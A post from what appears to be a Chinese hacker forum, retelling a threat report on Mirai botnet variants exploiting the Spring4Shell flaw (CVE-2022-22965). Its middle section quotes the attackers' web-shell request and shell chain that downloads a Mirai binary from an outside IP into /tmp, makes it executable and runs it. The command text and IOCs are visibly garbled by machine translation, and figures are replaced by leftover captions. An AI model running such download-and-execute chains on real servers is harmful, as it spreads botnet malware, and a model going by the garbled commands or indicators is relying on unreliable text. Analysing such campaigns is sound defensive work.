• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

Mirai未来组合僵尸网络利用Spring4Shell漏洞


Recommended Posts

Mirai未来组合僵尸网络变种已经开始利用Spring4Shell漏洞。

3月底,研究人员发现了Spring4Shell 0day的漏洞,随后发布了补丁。4月初,趋势科技安全研究人员发现攻击者利用Spring4Shell漏洞将Mirai未来组合僵尸网络武器化。

Spring4Shell漏洞概述

Spring framework是一个开源的J2EE应用框架,可以帮助软件开发者快速开发出具有企业特色的Java应用。近日,安全研究人员在Spring Spring Java中发现了两个可以实现远程代码执行的安全漏洞。CVE的数字分别是CVE-2022-22963和CVE-2022-22965,CVSS的分数是9.8。其中,CVE-2022-22965漏洞,又称Spring4Shell,是由传递参数的不安全反序列化造成的。攻击者可以利用该漏洞在应用程序中实现远程代码执行。

Mirai 利用Spring4Shell漏洞

4月初,研究人员发现攻击者利用Spring4Shell漏洞将Mirai未来组合僵尸网络武器化,并在易受攻击的服务器上执行Mirai未来组合僵尸网络恶意软件。受害者主要位于新加坡。

Mirai未来组合示例将被下载到/tmp文件夹,然后在执行之前被chmod修改成可执行文件。利用请求和命令如下:

http://{受害者P}:9090/tomcatwar[。]jsp?pwd=jcmd=CD/tmp;wget http://45[。]95[.]169[.420吸烟区。]DNS/kkvettgaaasecnnaaa . x86;chmod 777 *;/kkvettgaaasecnnaaa . x86 m spring[。]x86

CD/tmp;wgethttp://45[。]95[.]169[.]143/the 420 smoke place . DNS/kkvettgaaaasecnnaaa . x86;chmod 777 *;/kkvetgaaaasecnnaaa . x 86m spring[。]x86

http://45[.]95[.]169[.420吸烟区。]DNS/kkvettgaasecnnaaaa . x86Specific  headers  and  class  attributes  for  the  creation  of  a  JSP  web  shell

研究人员还发现了适用于不同CPU架构的恶意软件文件服务器的其他变体:

Mirai  malware  samples  for  different  CPU  architectures

不同CPU架构的Mirai未来组合变体

wget.sh脚本将从恶意服务器下载二进制文件并执行所有示例。执行后,这些文件将从硬盘中删除。从恶意服务器提取的wget.sh内容如下:

Content  of  “wget.sh” as  retrieved  from  a  malicious  server

图wget.sh从恶意服务器提取的内容

Link to comment
Share on other sites